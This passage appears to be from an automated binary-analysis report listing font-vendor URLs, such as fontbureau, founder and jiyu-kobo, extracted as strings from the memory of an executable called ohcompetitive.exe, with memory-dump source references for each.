Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.514657152.00000000059F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: ohcompetitive.exe, 0000000D.00000003.513815212.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.512980332.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.513068590.00000000059FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com=
Source: ohcompetitive.exe, 0000000D.00000003.514013301.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.512817121.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.513815212.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.514273745.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.512980332.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.514657152.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.513068590.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.514413673.00000000059FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comC.TTF
Source: ohcompetitive.exe, 0000000D.00000003.514957718.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.516832849.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.515089854.00000000059FC000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.515273443.0000000005A01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comF8
Source: ohcompetitive.exe, 0000000D.00000003.519426984.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521005742.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521203636.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519704126.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519898696.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520716541.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520042323.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520548523.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521467754.0000000005A01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comFr
Source: ohcompetitive.exe, 0000000D.00000003.514013301.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.514957718.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.515089854.00000000059FC000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.513815212.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.514273745.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.512980332.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.514657152.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.513068590.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.515273443.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.514413673.00000000059FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comL
Source: ohcompetitive.exe, 0000000D.00000003.519426984.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521005742.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521203636.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519704126.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518710431.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518583858.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519898696.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518863186.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519072643.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518224673.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518336828.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520716541.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520042323.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520548523.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521467754.0000000005A01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comalic
Source: ohcompetitive.exe, 0000000D.00000003.514957718.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.515089854.00000000059FC000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.514657152.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.515273443.0000000005A01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comd
Source: ohcompetitive.exe, 0000000D.00000003.519426984.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521005742.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519704126.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519898696.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519072643.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520716541.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520042323.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520548523.0000000005A01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comd/
Source: ohcompetitive.exe, 0000000D.00000003.518048175.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519426984.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521005742.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519704126.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518710431.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518583858.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519898696.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518863186.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519072643.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518224673.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518336828.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520716541.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520042323.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520548523.0000000005A01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comdg
Source: ohcompetitive.exe, 0000000D.00000003.514013301.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.512817121.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.514957718.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.515089854.00000000059FC000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.512494568.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.513815212.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.514273745.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.512980332.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.514657152.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.513068590.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.515273443.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.514413673.00000000059FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comessed&
Source: ohcompetitive.exe, 0000000D.00000003.514957718.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.515089854.00000000059FC000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.514657152.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.515273443.0000000005A01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comessed/
Source: ohcompetitive.exe, 0000000D.00000003.519426984.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521005742.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521203636.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519704126.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519898696.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520716541.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520042323.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520548523.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521467754.0000000005A01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comessedU
Source: ohcompetitive.exe, 0000000D.00000003.538281911.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.538905369.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comg
Source: ohcompetitive.exe, 0000000D.00000003.511458966.00000000059FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.coml1
Source: ohcompetitive.exe, 0000000D.00000003.512387233.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.512054334.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.512494568.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.511568124.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.511723626.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.511458966.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.511083697.00000000059FE000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.512211572.00000000059FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.como
Source: ohcompetitive.exe, 0000000D.00000003.511303695.00000000059FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.como.jp/8
Source: ohcompetitive.exe, 0000000D.00000003.518048175.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519426984.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521005742.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519704126.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518710431.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518583858.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519898696.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518863186.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519072643.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518224673.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.518336828.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520716541.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520042323.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520548523.0000000005A01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comrsiv&
Source: ohcompetitive.exe, 0000000D.00000003.518048175.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.517733333.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.517949172.00000000059F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comsiva
Source: ohcompetitive.exe, 0000000D.00000003.545548318.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.541640595.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.540614622.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.774280885.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.538281911.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.538905369.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.546200631.0000000005A04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comuev
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: ohcompetitive.exe, 0000000D.00000003.488625546.00000000059EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.cHI
Source: ohcompetitive.exe, 0000000D.00000003.487287458.00000000059F1000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.486927108.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.487075159.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.487679733.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.486770852.00000000059EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.c
Source: ohcompetitive.exe, 0000000D.00000003.487287458.00000000059F1000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.486927108.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.487075159.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.487679733.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.486770852.00000000059EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ohcompetitive.exe, 0000000D.00000003.487287458.00000000059F1000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.487679733.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/of
Source: ohcompetitive.exe, 0000000D.00000003.485921612.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/qR
Source: ohcompetitive.exe, 0000000D.00000003.487287458.00000000059F1000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.486927108.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.487886537.00000000059F3000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.487075159.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.488168899.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.487679733.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.486770852.00000000059EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cna-eEI
Source: ohcompetitive.exe, 0000000D.00000003.487287458.00000000059F1000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.486927108.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.487886537.00000000059F3000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.487075159.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.488168899.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.487679733.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.486770852.00000000059EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cnt
Source: ohcompetitive.exe, 0000000D.00000003.526536896.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.526156504.00000000059FC000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.525856539.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.526815993.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.527048737.0000000005A01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.713550509.00000000059D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: ohcompetitive.exe, 0000000D.00000003.495668506.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.490758260.00000000059FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ohcompetitive.exe, 0000000D.00000003.493511255.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.492786739.00000000059FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/&
Source: ohcompetitive.exe, 0000000D.00000003.493511255.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.492786739.00000000059FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/(F
Source: ohcompetitive.exe, 0000000D.00000003.491869030.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.494872998.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.494716862.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.493511255.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.492786739.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.495668506.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp//
Source: ohcompetitive.exe, 0000000D.00000003.491869030.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.494872998.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.494716862.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.493511255.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.492786739.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.495668506.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/8
Source: ohcompetitive.exe, 0000000D.00000003.493511255.00000000059FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/U
Source: ohcompetitive.exe, 0000000D.00000003.491309395.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.491869030.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.493511255.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.492786739.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.490758260.00000000059FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/X
Source: ohcompetitive.exe, 0000000D.00000003.493511255.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.492786739.00000000059FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/
Source: ohcompetitive.exe, 0000000D.00000003.491869030.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.492786739.00000000059FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/g
Source: ohcompetitive.exe, 0000000D.00000003.505383503.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.504316024.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.506865785.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.505031615.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.505705537.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.491869030.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.504385554.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.506524506.00000000059F6000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.504175006.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.494872998.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.506336336.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.494716862.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.493511255.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.504254920.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.505201466.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.505487686.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.504775796.00000000059F8000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.492786739.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.506130055.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.495668506.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: ohcompetitive.exe, 0000000D.00000003.494872998.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.494716862.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.493511255.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.495668506.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/g
Source: ohcompetitive.exe, 0000000D.00000003.491869030.00000000059FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/o
Source: ohcompetitive.exe, 0000000D.00000003.491869030.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.494872998.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.494716862.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.493511255.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.495668506.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/p
Source: ohcompetitive.exe, 0000000D.00000003.530175384.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.monotype.
Source: ohcompetitive.exe, 0000000D.00000003.506130055.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.monotype.c
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: ohcompetitive.exe, 0000000D.00000003.494716862.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.comm
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.489340121.00000000059FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
